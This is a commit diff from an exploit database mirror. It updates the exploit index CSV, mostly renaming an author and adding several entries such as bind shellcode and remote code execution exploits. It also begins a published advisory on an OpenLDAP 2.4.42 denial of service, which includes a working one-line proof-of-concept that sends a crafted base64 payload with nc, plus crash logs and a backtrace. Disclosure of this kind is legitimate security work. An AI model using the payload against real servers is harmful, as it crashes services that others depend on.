DB: 2015-09-12
6 new exploits
This commit is contained in:
parent
42b241205e
commit
1ba31aab30
7 changed files with 563 additions and 20 deletions
46
files.csv
46
files.csv
|
@ -33262,7 +33262,7 @@ id,file,description,date,author,platform,type,port
|
|||
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
|
||||
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
|
||||
36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
|
||||
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
|
||||
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
|
||||
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
|
||||
36863,platforms/php/webapps/36863.txt,"Joomla Machine Component Multiple SQL Injection Vulnerabilities",2012-02-20,the_cyber_nuxbie,php,webapps,0
|
||||
36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0
|
||||
|
@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
|
|||
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
|
||||
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0
|
||||
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
|
||||
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
|
||||
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
|
||||
|
@ -33384,8 +33384,8 @@ id,file,description,date,author,platform,type,port
|
|||
36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injection Vulnerabilities",2015-05-11,"Filippo Roncari",php,webapps,0
|
||||
36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Path Traversal Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
|
||||
36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
|
||||
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0
|
||||
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0
|
||||
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0
|
||||
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,hyp3rlinx,php,webapps,0
|
||||
36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80
|
||||
36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting Vulnerability",2012-03-21,"Stefan Schurtz",php,webapps,0
|
||||
36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
|
||||
|
@ -33461,7 +33461,7 @@ id,file,description,date,author,platform,type,port
|
|||
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
|
||||
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
|
||||
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
|
||||
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,"John Page",jsp,webapps,80
|
||||
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80
|
||||
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -33658,9 +33658,9 @@ id,file,description,date,author,platform,type,port
|
|||
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
|
||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
|
||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80
|
||||
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
|
||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080
|
||||
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||
37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
|
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
|
|||
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
|
||||
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
|
||||
37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
|
||||
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
|
||||
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80
|
||||
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
|
||||
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
|
||||
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
|
||||
|
@ -33796,7 +33796,7 @@ id,file,description,date,author,platform,type,port
|
|||
37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection Vulnerability",2012-06-20,"Taurus Omar",php,webapps,0
|
||||
37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting Vulnerability",2012-06-21,"Sooraj K.S",php,webapps,0
|
||||
37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,"John Page",php,webapps,80
|
||||
37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80
|
||||
37441,platforms/jsp/webapps/37441.txt,"WedgeOS <= 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0
|
||||
37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434
|
||||
37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Vulnerability",2012-06-21,CoBRa_21,php,webapps,0
|
||||
|
@ -33867,7 +33867,7 @@ id,file,description,date,author,platform,type,port
|
|||
37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
|
||||
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,"John Page",php,webapps,80
|
||||
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
|
||||
37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
|
||||
37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
|
||||
37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
|
||||
|
@ -33877,7 +33877,7 @@ id,file,description,date,author,platform,type,port
|
|||
37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload Vulnerability",2012-07-21,Am!r,php,webapps,0
|
||||
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
|
||||
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
|
||||
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
|
||||
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,hyp3rlinx,windows,dos,0
|
||||
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
|
||||
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
|
||||
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
|
||||
|
@ -33930,7 +33930,7 @@ id,file,description,date,author,platform,type,port
|
|||
37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
|
||||
37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass Vulnerability",2012-08-07,i-Hmx,php,webapps,0
|
||||
37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include Vulnerability",2012-08-07,PuN!Sh3r,php,webapps,0
|
||||
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,"John Page",php,webapps,80
|
||||
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80
|
||||
37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0
|
||||
37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
|
||||
37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection Vulnerability",2012-08-08,G-B,php,webapps,0
|
||||
|
@ -34020,7 +34020,7 @@ id,file,description,date,author,platform,type,port
|
|||
37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
|
||||
37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
|
||||
37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
|
||||
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
|
||||
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
|
||||
37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
|
||||
37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
|
||||
37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
|
||||
|
@ -34033,7 +34033,7 @@ id,file,description,date,author,platform,type,port
|
|||
37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
|
||||
37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0
|
||||
37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
|
||||
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
|
||||
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
|
||||
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
|
||||
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
|
||||
37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
|
||||
|
@ -34043,10 +34043,10 @@ id,file,description,date,author,platform,type,port
|
|||
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
|
||||
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
|
||||
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
|
||||
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
|
||||
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,hyp3rlinx,php,webapps,0
|
||||
37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
|
||||
37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0
|
||||
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
|
||||
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,hyp3rlinx,php,webapps,80
|
||||
37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
|
||||
37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
|
||||
37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
|
||||
|
@ -34153,9 +34153,9 @@ id,file,description,date,author,platform,type,port
|
|||
37812,platforms/win32/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,metasploit,win32,remote,8443
|
||||
37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,metasploit,windows,local,0
|
||||
37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,metasploit,python,remote,0
|
||||
37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,"John Page",php,webapps,80
|
||||
37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,"John Page",php,webapps,80
|
||||
37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,"John Page",php,webapps,80
|
||||
37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,hyp3rlinx,php,webapps,80
|
||||
37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,hyp3rlinx,php,webapps,80
|
||||
37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80
|
||||
37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
|
||||
37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
|
||||
37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
|
||||
|
@ -34382,6 +34382,7 @@ id,file,description,date,author,platform,type,port
|
|||
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
|
||||
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
|
||||
38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
|
||||
38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack Vulnerability",2015-09-02,"Pier-Luc Maltais",php,webapps,80
|
||||
38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal Vulnerability",2015-09-02,HaHwul,php,webapps,80
|
||||
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
|
||||
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
|
||||
|
@ -34410,7 +34411,7 @@ id,file,description,date,author,platform,type,port
|
|||
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
|
||||
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
|
||||
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
|
||||
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
|
||||
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081
|
||||
38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 - XSS Vulnerability",2015-09-08,Outlasted,php,webapps,80
|
||||
38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
|
||||
38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
|
||||
|
@ -34429,6 +34430,7 @@ id,file,description,date,author,platform,type,port
|
|||
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
|
||||
38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
|
||||
38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
|
||||
38126,platforms/osx/shellcode/38126.c,"OS X x64 - tcp bind shellcode_ NULL byte free (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
|
||||
38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
|
||||
38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
|
||||
38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
|
||||
|
@ -34445,3 +34447,7 @@ id,file,description,date,author,platform,type,port
|
|||
38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0
|
||||
38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting Vulnerability",2012-12-24,"Rafay Baloch",php,webapps,0
|
||||
38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection Vulnerability",2012-12-22,3spi0n,php,webapps,0
|
||||
38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
|
||||
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
|
||||
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
|
||||
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
129
platforms/linux/dos/38145.txt
Executable file
129
platforms/linux/dos/38145.txt
Executable file
|
@ -0,0 +1,129 @@
|
|||
# Exploit Title: OpenLDAP 2.4.42 ber_get_next DOS
|
||||
# Date: 11/09/15
|
||||
# Exploit Author: Denis Andzakovic - Security-Assessment.com
|
||||
# Vendor Homepage: http://www.openldap.org/
|
||||
# Software Link:
|
||||
ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/openldap-2.4.42.tgz
|
||||
# Version: <= 2.4.42
|
||||
# Tested on: Debian 8
|
||||
|
||||
( , ) (,
|
||||
. '.' ) ('. ',
|
||||
). , ('. ( ) (
|
||||
(_,) .'), ) _ _,
|
||||
/ _____/ / _ \ ____ ____ _____
|
||||
\____ \==/ /_\ \ _/ ___\/ _ \ / \
|
||||
/ \/ | \\ \__( <_> ) Y Y \
|
||||
/______ /\___|__ / \___ >____/|__|_| /
|
||||
\/ \/.-. \/ \/:wq
|
||||
(x.0)
|
||||
'=.|w|.='
|
||||
_=''"''=.
|
||||
|
||||
presents..
|
||||
OpenLDAP get_ber_next Denial of Service
|
||||
Affected Versions: OpenLDAP <= 2.4.42
|
||||
|
||||
PDF: http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf
|
||||
|
||||
+-------------+
|
||||
| Description |
|
||||
+-------------+
|
||||
By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert() statement, crashing
|
||||
the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian
|
||||
package repository.
|
||||
|
||||
+--------------+
|
||||
| Exploitation |
|
||||
+--------------+
|
||||
By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an
|
||||
assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data.
|
||||
|
||||
The following proof of concept exploit can be used to trigger the condition:
|
||||
|
||||
--[ Exploit POC
|
||||
echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389
|
||||
|
||||
The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash
|
||||
the server even when running in daemon mode.
|
||||
|
||||
--[ sladp -d3
|
||||
55f0b36e slap_listener_activate(7):
|
||||
55f0b36e >>> slap_listener(ldap:///)
|
||||
55f0b36e connection_get(15): got connid=1000
|
||||
55f0b36e connection_read(15): checking for input on id=1000
|
||||
ber_get_next
|
||||
ldap_read: want=8, got=8
|
||||
0000: ff 84 84 84 84 84 77 83 ......w.
|
||||
55f0b36e connection_get(15): got connid=1000
|
||||
55f0b36e connection_read(15): checking for input on id=1000
|
||||
ber_get_next
|
||||
ldap_read: want=1, got=1
|
||||
0000: 0a .
|
||||
55f0b36e connection_get(15): got connid=1000
|
||||
55f0b36e connection_read(15): checking for input on id=1000
|
||||
ber_get_next
|
||||
slapd: io.c:682: ber_get_next: Assertion `0' failed.
|
||||
|
||||
The following GDB back trace provides further information as to the location of the issue.
|
||||
|
||||
--[ back trace
|
||||
program received signal SIGABRT, Aborted.
|
||||
[Switching to Thread 0x7ffff2e4a700 (LWP 1371)]
|
||||
0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
|
||||
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
|
||||
(gdb) bt
|
||||
#0 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
|
||||
#1 0x00007ffff6a144e8 in __GI_abort () at abort.c:89
|
||||
#2 0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c",
|
||||
